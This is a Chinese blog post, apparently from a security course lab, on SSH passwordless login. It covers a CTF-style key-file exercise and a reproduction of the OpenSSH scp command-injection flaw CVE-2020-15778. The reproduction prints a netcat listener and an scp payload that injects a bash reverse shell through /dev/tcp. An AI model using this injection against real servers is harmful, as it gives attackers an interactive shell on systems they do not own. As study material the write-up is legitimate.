ssh免密登录于linux系统上的使用及其漏洞

已于 2022-04-25 02:06:39 修改
阅读量2.1k 收藏 2
点赞数
分类专栏: 网安 文章标签: bash linux 运维
于 2022-04-25 01:41:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l4kjih3gfe2dcba1/article/details/124395628
版权

ssh免密登录于linux系统上用于渗透的使用及其漏洞

文章目录

免密登录使用教程

参考博文

渗透实验

通过操作机终端使用ssh登录靶机的test用户(密码123),test用户目录中存放了可用于ssh免密码登录靶机的flag用户所必要的文件,使用这些文件登录靶机的flag用户,flag存在于flag用户目录中。

首先解析题目并登录靶机,由于题目坑爹,其实所需文件在flag目录下,所以我们把它复制到自己的目录下

在这里插入图片描述在这里插入图片描述
我们发现其内是一个压缩包,在/home/test/.ssh/路径下解压它,得到免密登录所需的文件,然后直接ssh免密登录flag@localhost用户得到flag
在这里插入图片描述

CVE漏洞CVE-2020-15778

源博文
首先对目标任意端口打开侦听,这里随便选择一个4444端口nc -lvvp 4444
使用ssh免密登录利用scp进行shell命令注入

scp test.txt username@x.x.x.x:'`bash -i >& /dev/tcp/x.x.x.x/4444 0>&1` /tmp/test.txt'

其中x.x.x.x为目标ip,发送文件与接收文件目录都不重要,重要的是中间的bash指令bash -i >& /dev/tcp/x.x.x.x/4444 0>&1可以创建并返回一个交互式shell

在这里插入图片描述
如图我们在nc监听处得到了一个交互shell

免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。

winnower-sliff
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
OpenSSH 代码问题漏洞(CVE-2023-38408)升级到最新版
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
10-16 2198
其中,ssh-agent是一个后台程序,可缓存用于SSH公钥身份验证的私钥,通过跟踪用户的身份钥和码来简化用户身份验证过程。一旦这些钥存储在ssh-agent中,它就允许用户访问其他服务器,而无需重新输入码或码,从而提供流畅的单点登录(SSO)体验,从而减少常规码输入的需要。通过Openssh配置(sshd_config)、防火墙,安全组ACL等限制来源访问IP为白名单仅可信IP地址,同时,非必要,关闭SSH代理转发功能,禁止在有关主机启用ssh隧道等。,或升级到9.4p1或9.5p1版本;
OpenSSH命令注入漏洞(CVE-2020-15778)
热门推荐
qq_42947816的博客
02-09 2万+
一般在特定环境下利用,比如在知道SSH账户码后,但禁用SSH登陆或SSH连接被阻止,服务器允许使用scp传文件的情况下,可对其进行命令注入,所以如果攻击者不知道ssh,此漏洞无法利用。
SSH弱口令渗透测试
weixin_66469999的博客
10-19 2084
SSH弱口令渗透测试
漏洞复现篇:ssh爆破
最新发布
m0_65615852的博客
04-18 1326
漏洞复现篇:ssh爆破(非常详细的ssh爆破过程)
害怕Linux SSH不安全?这几个小妙招安排上!
网络技术联盟站
03-05 1101
本文给大家介绍了很多提升Linux SSH安全性的妙招,希望大家看完本文后就能给服务器安排上!
linux ssh权限漏洞,linux sudo root 权限绕过漏洞(CVE-2019-14287)
weixin_39616503的博客
04-30 177
0x01html逛圈子社区论坛 看到了 linux sudo root 权限绕过漏洞(CVE-2019-14287) 跟着复现下linux综合来讲 这个漏洞做用不大 须要如下几个前提条件数据库1.知道当前普通用户的码bash2.当前普通用户在souduers文件中服务器3.本地提权须要本地操做 估计远程ssh链接的终端会失败ssh0x02ui此漏洞可使受限制的用户运行root命令spa1....
详解Java使用Jsch与sftp服务器实现ssh登录
10-16
主要介绍了详解Java使用Jsch与sftp服务器实现ssh登录,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
Linux 配置SSH登录ssh-keygen”的基本用法
09-14
SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性...利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题,这篇文章主要介绍了Linux 配置SSH登录ssh-keygen”的基本用法 ,需要的朋友可以参考下
expect命令在linux下实现批量ssh
09-15
本次文章主要给大家讲解了在linux系统下用expect命令实现批量ssh的实现方法,以及实际代码分享。
linuxssh通信的实现
01-11
什么是ssh 管理员可以通过远程登陆的方式,对通过网相连的分散于各处的多台主机进行...为了更方便快捷的切换主机,ssh通信不失为更好的选择; 用ssh-keygen生成钥,默认保存在本地的/root/.ssh/id_rsa 然后在
centos7 ssh登录自动化配置脚本(ps:已测试过)
02-01
shell+expect编写的 大数据集群ssh登录自动化配置脚本(带说明文档)
一个检测ssh安全性的工具
06-26
一个检测ssh安全性的工具,可检测ssh的版本,更新时间,是否有ssh的心血漏洞等各种检查工具,现开源出来
linux主机安全和漏洞修复
xiaoma19961101的博客
10-12 3871
linux主机安全和漏洞修复 1.隐藏SSH的Banner信息 #1.检查方法 隐藏SSH的Banner信息: 查看sshd_config文件中是否存在未注释的Banner /etc/issue.net行,不存在未注释的Banner行视为合规 查看命令:cat /etc/ssh/sshd_config #2.加固步骤 隐藏SSH的Banner信息: 1. 备份sshd_config文件 cp -p /etc/ssh/sshd_config /etc/ssh/sshd_config_bak 2. 编辑ssh
Linux系统漏洞分析和处理
小树苗
05-13 3628
web漏洞解决办法 1、检测到目标URL存在http host头攻击漏洞 Apache: 增加配置 UseCanonicalName On 2、检测到目标服务器存在应用程序错误 详细信息: 若要使他人能够从本地服务器计算机上查看此特定错误信息的详细信息,请在位于当前 Web 应用程序根目录下的“web.config”配置文件中创建一个 <customErrors> 标记。然后应将...
漏洞修复-SSH版本信息可被获取漏洞
水布天
09-06 1126
新分配下来的云服务,在没有投入生产环境之前,漏扫和安全防固是两项基本工作。SSH版本信息可以被获取,就是在ssh登陆对应主机的时候,登录过程中会暴露SSH的信息。自定义Banner来代替系统默认的Banner,保证SSH信息不被泄露。运行完毕查看ssh状态,重新扫描服务器验证此漏洞修复情况。CNCVE编号 :CNCVE-19990634。通过查看服务的启动时间,判断重启服务的成功与否。CVE编号 :CVE-1999-0634。发现日期 :1999-01-01。6、验证无误后,脚本化。
SSH协议中发现新安全漏洞CVE-2023-48795
极道Jdon的技术博客
01-02 3015
通过利用这些缺陷,研究人员演示了一种 "前缀截断攻击",攻击者可以在不被发现的情况下删除 SSH 会话开始时的加数据包。Terrapin 攻击是 SSH 协议本身的一种新型攻击,通过中间人(MITM)攻击,导致被攻击的客户端错误地认为服务器不支持用户身份验证中使用的最新签名算法。德国波鸿鲁尔大学的一组研究人员发现了 Secure Shell (SSH) 协议中的新安全漏洞,攻击者可能会利用该漏洞破坏 SSH 连接的完整性。通过欺骗客户端了解服务器的能力,降低所支持的钥交换和身份验证算法的等级。
系统安全实验(伪造IP,输出重定向获取flag)
weixin_53562571的博客
03-23 549
Linux系统中文件的权限是很重要的一部分,通常的权限由读、写、执行三位组成,对每个文件都指定了文件所有者、同用户组的权限和其它非本用户组的权限。我们现在要查找的是SUID这种特殊权限,所以要使用的必然是四位数字组合。注意,数字0表示忽略相应位置的权限,也就是说不考虑rwx权限,所以4000就表示查找被设置了SUID权限的文件,至于其它的rwx权限则根本不考虑。如果不加“-”,表示精确匹配,也就是查找的文件权限就是“4000”,除了suid权限之外,其它的rwx权限通通没有,这明显不符合要求。
系统安全实验 Week9
qq_52336746的博客
04-25 137
做了一个多小时没写出来,我最开始的思路是反汇编printf函数,找到num=0的时候要显示的值的地址,但没有得到最后答案,简单写一下吧。通过ssh远程连接靶机,账号test,码123,尝试使用GDB调试进行变量的赋值,Just run it!有个小小的注意事项,可以改变多个字符的编码方式,我同时改变了DJ的编码方式,输入浏览器成功得到flag。很简单的一道题目,就如同你看到的那样——解再解,通过ssh连接靶机,账号test,码123。题目写的还蛮清楚的,代码审计。GDB调试_qsj(100分)
ssh登陆服务器配置安全版扫描攻击
tt15304911199的博客
02-09 296
ssh登陆服务器配置 这里介绍服务器ssh登陆配置及安全性简单增强版,基本上都可以实现,非常方便实用 文章目录ssh登陆服务器配置前言安全配置目标一、生成ssh钥二、使用步骤1.引入库2.读入数据总结 前言 不知道大家有没有遇到过这种情况,你的云服务器部署完项目后好久没有登陆了,一登陆ssh一看,好家伙 ssh登陆失败4788次。。显然是被恶意扫描攻击了,这种攻击是专门扫描22端口破解你的码的,如果你的简单的码很简单,那么恭喜你你的服务器就不知道会干什么去了~~~~所以建议大家配置
如何在Linux上通过ssh 登录Windows系统,以及如何在windows上通过ssh登录Linux系统
05-22
要在Linux上通过ssh登录Windows系统,可以使用Windows系统上的OpenSSH Server。具体步骤如下: 1. 在Windows系统中安装OpenSSH Server。可以在Windows 10的“应用和功能”中找到它并进行安装。 2. 配置OpenSSH...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

winnower-sliff

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值